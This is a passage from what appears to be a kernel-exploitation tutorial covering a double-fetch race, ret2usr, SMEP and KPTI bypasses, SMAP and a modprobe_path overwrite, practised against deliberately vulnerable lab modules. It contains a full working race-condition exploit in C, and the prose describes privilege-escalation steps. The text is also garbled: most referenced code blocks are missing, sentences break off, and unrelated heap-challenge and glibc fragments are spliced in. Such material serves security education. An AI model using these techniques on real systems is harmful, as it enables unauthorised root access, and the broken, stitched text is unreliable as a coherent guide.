The C program will hang on write until the kernel module returns, so we can't use the main thread.
With that in mind, the "exploit" is fairly self-explanatory - we start another thread, wait 0.3 seconds, and change id!
We have to compile it statically, as the VM has no shared libraries.
Now we have to somehow get it into the file system. In order to do that, we need to first extract the .cpio archive (you may want to do this in another folder):
Now copy exploit there and make sure it's marked executable. You can then compress the filesystem again:
Use the newly-created initramfs.cpio to lauch the VM with run.sh. Executing exploit, it is successful!
Note that the VM loaded you in as root by default. This is for debugging purposes, as it allows you to use utilities such as dmesg to read the kernel module output and check for errors, as well as a host of other things we will talk about. When testing exploits, it's always helpful to fix the init script to load you in as root! Just don't forget to test it as another user in the end.
Kernel ROP - ret2usr
ROPpety boppety, but now in the kernel
Introduction
By and large, the principle of userland ROP holds strong in the kernel. We still want to overwrite the return pointer, the only question is where.
The most basic of examples is the ret2usr technique, which is analogous to ret2shellcode - we write our own assembly that calls commit_creds(prepare_kernel_cred(0)), and overwrite the return pointer to point there.
Vulnerable Module
Note that the kernel version here is 6.1, due to some modifications we will discuss later.
The relevant code is here:
As we can see, it's a size 0x100memcpy into an 0x20 buffer. Not the hardest thing in the world to spot. The second printk call here is so that buffer is used somewhere, otherwise it's just optimised out by make and the entire function just becomes xor eax, eax; ret!
Exploitation
Assembly to escalate privileges
Firstly, we want to find the location of prepare_kernel_cred() and commit_creds(). We can do this by reading /proc/kallsyms, a file that contains all of the kernel symbols and their locations (including those of our kernel modules!). This will remain constant, as we have disabled .
For obvious reasons, you require root permissions to read this file!
Now we know the locations of the two important functions: After that, the assembly is pretty simple. First we call prepare_kernel_cred(0):
Then we call commit_creds() on the result (which is stored in RAX):
We can throw this directly into the C code using inline assembly:
Overflow
The next step is overflowing. The 7th qword overwrites RIP:
Finally, we create a get_shell() function we call at the end, once we've escalated privileges:
Returning to userland
If we run what we have so far, we fail and the kernel panics. Why is this?
The reason is that once the kernel executes commit_creds(), it doesn't return back to user space - instead it'll pop the next junk off the stack, which causes the kernel to crash and panic! You can see this happening while you debug (which ).
What we have to do is force the kernel to swap back to user mode. The way we do this is by saving the initial userland register state from the start of the program execution, then once we have escalate privileges in kernel mode, we restore the registers to swap to user mode. This reverts execution to the exact state it was before we ever entered kernel mode!
We can store them as follows:
The CS, SS, RSP and RFLAGS registers are stored in 64-bit values within the program. To restore them, we append extra assembly instructions in escalate() for after the privileges are acquired:
Here the GS, CS, SS, RSP and RFLAGS registers are restored to bring us back to user mode (GS via the swapgs instruction). The RIP register is updated to point to get_shell and pop a shell.
If we compile it statically and load it into the initramfs.cpio, notice that our privileges are elevated!
We have successfully exploited a ret2usr!
Understanding the restoration
How exactly does the above assembly code restore registers, and why does it return us to user space? To understand this, we have to know what do. The switch to kernel mode is best explained by , or .
. The (model-specific registers); at the entry to a kernel-space routine, swapgs enables the process to obtain a pointer to kernel data structures.
Has to swap back to user space
SS - Stack Segment
GS is changed back via the swapgs instruction. All others are changed back via , the QWORD variant of the iret family of intel instructions. The intent behind iretq is to be the way to return from exceptions, and it is specifically designed for this purpose, as seen in Vol. 2A 3-541 of the :
Returns program control from an exception or interrupt handler to a program or procedure that was interrupted by an exception, an external interrupt, or a software-generated interrupt. These instructions are also used to perform a return from a nested task. (A nested task is created when a CALL instruction is used to initiate a task switch or when an interrupt or exception causes a task switch to an interrupt or exception handler.)
[...]
During this operation, the processor pops the return instruction pointer, return code segment selector, and EFLAGS image from the stack to the EIP, CS, and EFLAGS registers, respectively, and then resumes execution of the interrupted program or procedure.
As we can see, it pops all the registers off the stack, which is why we push the saved values in that specific order. It may be possible to restore them sequentially without this instruction, but that increases the likelihood of things going wrong as one restoration may have an adverse effect on the following - much better to just use iretq.
Final Exploit
The final version
$ r2 -d -A heap1 AAAA BBBB
$ r2 -d -A heap1
$ s main; pdf
[...]
0x004006e6 e8f5fdffff call sym.imp.strcpy ; char *strcpy(char *dest, const char *src)
0x004006eb bfa8074000 mov edi, str.and_that_s_a_wrap_folks ; 0x4007a8 ; "and that's a wrap folks!"
0x004006f0 e8fbfdffff call sym.imp.puts
char fakemetadata[0x10] = "\x30\0\0\0\0\0\0\0"; // so we can ignore the "wrong size" error
char admin[0x10] = "Nuh-huh\0";
// List of users to keep track of
char *users[15];
int userCount = 0;
void main_loop() {
while(1) {
printf(">> ");
char input[2];
read(0, input, sizeof(input));
int choice = atoi(input);
switch (choice)
{
case 1:
createUser();
break;
case 2:
deleteUser();
break;
case 3:
complete_level();
default:
break;
}
}
}
typedef struct tcache_entry
{
struct tcache_entry *next;
/* This field exists to detect double frees. */
struct tcache_perthread_struct *key;
} tcache_entry;
/* Caller must ensure that we know tc_idx is valid and there's room
for more chunks. */
static __always_inline void tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
assert (tc_idx < TCACHE_MAX_BINS);
/* Mark this chunk as "in the tcache" so the test in _int_free will
detect a double free. */
e->key = tcache;
e->next = tcache->entries[tc_idx];
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}
#if USE_TCACHE
{
size_t tc_idx = csize2tidx (size);
if (tcache != NULL && tc_idx < mp_.tcache_bins)
{
/* Check to see if it's already in the tcache. */
tcache_entry *e = (tcache_entry *) chunk2mem (p);
/* This test succeeds on double free. However, we don't 100%
trust it (it also matches random payload data at a 1 in
2^<size_t> chance), so verify it's not an unlikely
coincidence before aborting. */
if (__glibc_unlikely (e->key == tcache))
{
tcache_entry *tmp;
LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
for (tmp = tcache->entries[tc_idx];
tmp;
tmp = tmp->next)
if (tmp == e)
malloc_printerr ("free(): double free detected in tcache 2");
/* If we get here, it was a coincidence. We've wasted a
few cycles, but don't abort. */
}
if (tcache->counts[tc_idx] < mp_.tcache_count)
{
tcache_put (p, tc_idx);
return;
}
}
}
#endif
KASLR
KASLR is the kernel version of ASLR, randomizing various parts of kernel space to make expoitation more complicated (in the exact same way regular ASLR does so for userspace exploitation).
static void __exit intro_exit(void) {
device_destroy(my_class, MKDEV(major, 0)); // remove the device
class_unregister(my_class); // unregister the device class
class_destroy(my_class); // remove the device class
unregister_chrdev(major, DEVICE_NAME); // unregister the major number
printk(KERN_INFO "[Intro] Closing!\n");
}
tcache_entry *tmp;
LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
for (tmp = tcache->entries[tc_idx]; tmp; tmp = tmp->next)
if (tmp == e)
malloc_printerr ("free(): double free detected in tcache 2");
/* If we get here, it was a coincidence. We've wasted a
few cycles, but don't abort. */
static __always_inline void tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
/* Mark this chunk as "in the tcache" so the test in _int_free will
detect a double free. */
e->key = tcache_key;
e->next = PROTECT_PTR (&e->next, tcache->entries[tc_idx]);
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}
struct cred {
/* ... */
kuid_t uid; /* real UID of the task */
kgid_t gid; /* real GID of the task */
kuid_t suid; /* saved UID of the task */
kgid_t sgid; /* saved GID of the task */
kuid_t euid; /* effective UID of the task */
kgid_t egid; /* effective GID of the task */
kuid_t fsuid; /* UID for VFS ops */
kgid_t fsgid; /* GID for VFS ops */
/* ... */
} __randomize_layout;
struct task_struct {
/* ... */
/*
* Pointers to the (original) parent process, youngest child, younger sibling,
* older sibling, respectively. (p->father can be replaced with
* p->real_parent->pid)
*/
/* Real parent process: */
struct task_struct __rcu *real_parent;
/* Recipient of SIGCHLD, wait4() reports: */
struct task_struct __rcu *parent;
/*
* Children/sibling form the list of natural children:
*/
struct list_head children;
struct list_head sibling;
struct task_struct *group_leader;
/* ... */
/* Objective and real subjective task credentials (COW): */
const struct cred __rcu *real_cred;
/* Effective (overridable) subjective task credentials (COW): */
const struct cred __rcu *cred;
/* ... */
};
/*
* The security context of a task
*
* The parts of the context break down into two categories:
*
* (1) The objective context of a task. These parts are used when some other
* task is attempting to affect this one.
*
* (2) The subjective context. These details are used when the task is acting
* upon another object, be that a file, a task, a key or whatever.
*
* Note that some members of this structure belong to both categories - the
* LSM security pointer for instance.
*
* A task has two security pointers. task->real_cred points to the objective
* context that defines that task's actual details. The objective part of this
* context is used whenever that task is acted upon.
*
* task->cred points to the subjective context that defines the details of how
* that task is going to act upon another object. This may be overridden
* temporarily to point to another security context, but normally points to the
* same context as task->real_cred.
*/
#define PASSWORD "p4ssw0rd"
typedef struct {
int id;
char password[10];
} Credentials;
static int id = 1001;
static ssize_t df_write(struct file *filp, const char __user *buf, size_t count, loff_t *f_pos) {
Credentials *creds = (Credentials *)buf;
printk(KERN_INFO "[Double-Fetch] Reading password from user...");
if (creds->id == 0) {
printk(KERN_ALERT "[Double-Fetch] Attempted to log in as root!");
return -1;
}
// to increase reliability
msleep(1000);
if (!strcmp(creds->password, PASSWORD)) {
id = creds->id;
printk(KERN_INFO "[Double-Fetch] Password correct! ID set to %d", id);
return id;
}
printk(KERN_ALERT "[Double-Fetch] Password incorrect!");
return -1;
}
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
typedef struct {
int id;
char password[10];
} Credentials;
int main() {
int fd = open("/dev/double_fetch", O_RDWR);
printf("FD: %d\n", fd);
Credentials creds;
creds.id = 900;
strcpy(creds.password, "p4ssw0rd");
int res_id = write(fd, &creds, 0); // last parameter here makes no difference
printf("New ID: %d\n", res_id);
return 0;
}
gcc -static -o exploit exploit.c
$ dmesg
[...]
[ 3.104165] [Double-Fetch] Password correct! ID set to 900
Credentials *creds = (Credentials *)buf;
if (creds->id == 0) {
printk(KERN_ALERT "[Double-Fetch] Attempted to log in as root!");
return -1;
}
if (!strcmp(creds->password, PASSWORD)) {
id = creds->id;
printk(KERN_INFO "[Double-Fetch] Password correct! ID set to %d", id);
return id;
}
// gcc -static -o exploit -pthread exploit.c
#include <fcntl.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
void *switcher(void *arg);
typedef struct {
int id;
char password[10];
} Credentials;
int main() {
// communicate with the module
int fd = open("/dev/double_fetch", O_RDWR);
printf("FD: %d\n", fd);
// use a random ID and set the password correctly
Credentials creds;
creds.id = 900;
strcpy(creds.password, "p4ssw0rd");
// set up the switcher thread
// pass it a pointer to `creds`, so it can modify it
pthread_t thread;
if (pthread_create(&thread, NULL, switcher, &creds)) {
fprintf(stderr, "Error creating thread\n");
return -1;
}
// now we write the cred struct to the module
// it should be swapped after about .3 seconds by switcher
int res_id = write(fd, &creds, 0);
// write returns the id we switched to
// if all goes well, that is 0
printf("New ID: %d\n", res_id);
// finish thread cleanly
if (pthread_join(thread, NULL)) {
fprintf(stderr, "Error joining thread\n");
return -1;
}
return 0;
}
void *switcher(void *arg) {
Credentials *creds = (Credentials *)arg;
// wait until the module is sleeping - don't want to change it BEFORE the initial ID check!
sleep(0.3);
creds->id = 0;
}
The kernel can request that a kernel module is loaded at runtime. If it does so, it will try to call request_module, which will spawn the modprobe tool using call_modprobe. modprobe is a userspace program that runs with root privileges, finds the required kernel module binary on filesystem and loads it.
The path to modprobe is in modprobe_path, a global variable in the kernel. We can read the value as a non-root user through /proc/sys/kernel/modprobe, with the default value being /sbin/modprobe.
If we can overwrite modprobe_path with another binary, e.g. /tmp/exec, this will be run with root privileges! That makes it very easy. To trigger modprobe, the easiest way is to execute a binary with an unknown signature:
To identify what program should be run to handle the signature, the kernel uses (code is slightly different in newer versions). This is run by request_module, but the signature .
The approach, therefore is simple. First compile a /tmp/hijack with source:
There are lots of possible payloads, but the end result is the same. This will copy /bin/sh to /tmp/sh and make it SUID. Now we create a file with an unknown signature:
Finally, overwrite modprobe_path to /tmp/hijack. When we execute /tmp/fake as a regular user, the kernel will spawn /tmp/hijack with root privileges and execute it!
Example
TODO
Debugging a Kernel Module
A practical example
Trying on the Latest Kernel
Let's try and run our previous code, but with the latest kernel version (as of writing, 6.10-rc5). The offsets of commit_creds and prepare_kernel_cred() are as follows, and we'll update exploit.c with the new values:
The major number needs to be updated to 253 in init for this version! I've done it automatically, but it bears remembering if you ever try to create your own module.
Instead of an elevated shell, we get a kernel panic, with the following data dump:
I could have left this part out of my blog, but it's valuable to know a bit more about debugging the kernel and reading error messages. I actually came across this issue while , so it happens to all of us!
One thing that we can notice is that, the error here is listed as a NULL pointer dereference error. We can see that the error is thrown in commit_creds():
We can , but chances are that the parameter passed to commit_creds() is NULL - this appears to be the case, since RDI is shown to be 0 above!
Opening a GDBserver
In our run.sh script, we now include the -s flag. This flag opens up a GDB server on port 1234, so we can connect to it and debug the kernel. Another useful flag is -S, which will automatically pause the kernel on load to allow us to debug, but that's not necessary here.
What we'll do is pause our exploit binary just before the write() call by using getchar(), which will hang until we hit Enter or something similar. Once it pauses, we'll hook on with GDB. Knowing the address of commit_creds() is 0xffffffff81077390, we can set a breakpoint there.
We then continue with c and go back to the VM terminal, where we hit Enter to continue the exploit. Coming back to GDB, it has hit the breakpoint, and we can see that RDI is indeed 0:
This explains the NULL dereference. RAX is also 0, in fact, so it's not a problem with the mov:
This means that prepare_kernel_cred() is returning NULL. Why is that? It didn't do that before!
Finding the Issue
Let's compare the differences in prepare_kernel_cred() code between kernel and :
The last and first parts are effectively identical, so there's no issue there. The issue arises in the way it handles a NULL argument. On 5.10, it treats it as using init_task:
i.e. if daemon is NULL, use init_task. On 6.10, the behaviour is altogether different:
If daemon is NULL, return NULL - hence our issue! Instead, we have to pass a valid cred struct into RDI. The simplest way is to just pass init_cred, which is actually a static offset from the kernel base! This means that if we're in a position to get commit_creds and prepare_kernel_cred, we can also get init_cred without major issues.
Passing in init_cred
init_cred is defined . There is no symbol associated with it (unless the kernel was compiled with debugging symbols), so we can't read /proc/kallsyms and get the address like that.
Kernel ROP - Disabling SMEP
An old technique
Setup
Using the same setuo as ret2usr, we make one single modification in run.sh:
Now if we load the VM and run our exploit from last time, we get a kernel panic.
Kernel Panic
It's worth noting what it looks like for the future - especially these 3 lines:
Overwriting CR4
So, instead of just returning back to userspace, we will try to overwrite CR4. Luckily, the kernel contains a very useful function for this: . This function quite literally overwrites CR4.
Assuming KASLR is still off, we can get the address of this function via /proc/kallsyms (if we update init to log us in as root):
Ok, it's located at 0xffffffff8102b6d0. What do we want to change CR4 to? If we look at the kernel panic above, we see this line:
CR4 is currently 0x00000000001006b0. If we remove the 20th bit (from the smallest, zero-indexed) we get 0x6b0.
The last thing we need to do is find some gadgets. To do this, we have to convert the bzImage file into a vmlinux ELF file so that we can run ropper or ROPgadget on it. To do this, we can run , from the official Linux git repository.
Putting it all together
All that changes in the exploit is the overflow:
We can then compile it and run.
Failure
This fails. Why?
If we look at the resulting kernel panic, we meet an old friend:
SMEP is enabled again. How? If we , we definitely hit both the gadget and the call to native_write_cr4(). What gives?
Well, if we look at , there's another feature:
Essentially, it will check if the val that we input disables any of the bits defined in cr4_pinned_bits. This value is , and stops "sensitive CR bits" from being modified. If they are, they are unset. Effectively, modifying CR4 doesn't work any longer - and hasn't since .
Kernel ROP - Privilege Escalation in Kernel Space
Bypassing SMEP by ropping through the kernel
The previous approach failed, so let's try and escalate privileges using purely ROP.
Modifying the Payload
Calling prepare_kernel_cred()
First, we have to change the ropchain. Start off with finding some useful gadgets and calling prepare_kernel_cred(0):
Now comes the trickiest part, which involves moving the result of RAX to RSI before calling commit_creds().
Moving RAX to RDI for commit_creds()
This requires stringing together a collection of gadgets (which took me an age to find). See if you can find them!
I ended up combining these four gadgets:
Gadget 1 is used to set RDX to 0, so we bypass the jne in Gadget 2 and hit ret
Gadget 2 and Gadget 3 move the returned cred struct from RAX to RDX
Returning to userland
Recall that we need swapgs and then iretq. Both can be found easily.
The pop rbp; ret is not important as iretq jumps away anyway.
To simulate the pushing of RIP, CS, SS, etc we just create the stack layout as it would expect - RIP|CS|RFLAGS|SP|SS, the reverse of the order they are pushed in.
If we try this now, we successfully escalate privileges!
Final Exploit
KPTI
Kernel Page Table Isolation
KPTI is designed to protect against attacks that abuse the shared user/kernel address space. Originally called KAISER, it is a mitigation originally created to prevent Meltdown-style microarchitectural vulnerabilities.
KPTI separates the page tables for user space and kernel space, creating two sets.
The first set, used by the kernel, includes a complete mapping of user space that the kernel can use for things like copy_to_user(). This page table has the NX bit set for userspace memory.
The user set maps the minimum amount of kernel virtual memory possible (e.g. exception handlers and code required for the user to transition to the kernel).
You can disable KPTI from the command line via the nopti argument. It is also automatically disabled if the CPU is not affected by meltdown.
Consequences and Bypasses
When in the user context, the kernel is not fully mapped. This doesn't affect most of our exploits, since they are executed in kernel mode.
However, when in kernel mode, userspace is mapped as non-executable. This means that we can't return to an escalate() function via iretq. The solution to this is to swap page tables back to user ones.
To achieve this, we can abuse a function of use that is descriptively called swapgs_restore_regs_and_return_to_usermode. Disassembling it (TODO!), we see that is starts with a load of pop instructions before a few mov and push and then a page table switch and a swapgs and iretq. We can jump to after the pop instructions to avoid having to fill those in. This is commonly called a KPTI Trampoline.
TODO example
Bypassing KPTI via a SIGSEGV Handler
Trying to return to user mode via iretq without switching page tables results in a SIGSEGV rather than a kernel crash, because we are in userspace.
An alternative method is therefore to use a SIGSEGV handler - the exploit gets root privileges, then tries to access userland and triggers a SIGSEGV. The kernel fault handler with switch the page tables for us when dispatching to the handler! A good example can be found .
TODO example
SMAP
Supervisor Memory Access Protection
SMAP is a more powerful version of SMEP. Instead of preventing code in user space from being accessed, SMAP places heavy restrictions on accessing user space at all, even for accessing data. SMAP blocks the kernel from even dereferencing (i.e. accessing) data that isn't in kernel space unless it is a set of very specific functions.
For example, functions such as strcpy or memcpy do not work for copying data to and from user space when SMAP is enabled. Instead, we are provided the functions copy_from_user and copy_to_user, which are allowed to briefly bypass SMAP for the duration of their operation. These functions also have additional hardening against attacks such as buffer overflows, with the function __copy_overflow acting as a guard against them.
This means that whether you interact using write/read or ioctl, the structs that you pass via pointers all get copied to kernel space using these functions before they are messed around with. This also means that double-fetches are even more unlikely to occur as all operations are based on the snapshot of the data that the module took when copy_from_user was called (unless copy_from_user is called on the same struct multiple times).
Like SMEP, SMAP is controlled by the CR4 register, in this case the 21st bit. It is also , so overwriting CR4 does nothing, and instead we have to work around it. There is no specific "bypass", it will depend on the challenge and will simply have to be accounted for.
Enabling SMAP is just as easy as SMEP:
Sometimes it needs to be disabled instead, in which case the option is nosmap.
Stac and Clac Instructions
TODO
Putting Exploit Data Into Kernel Memory instead of Userspace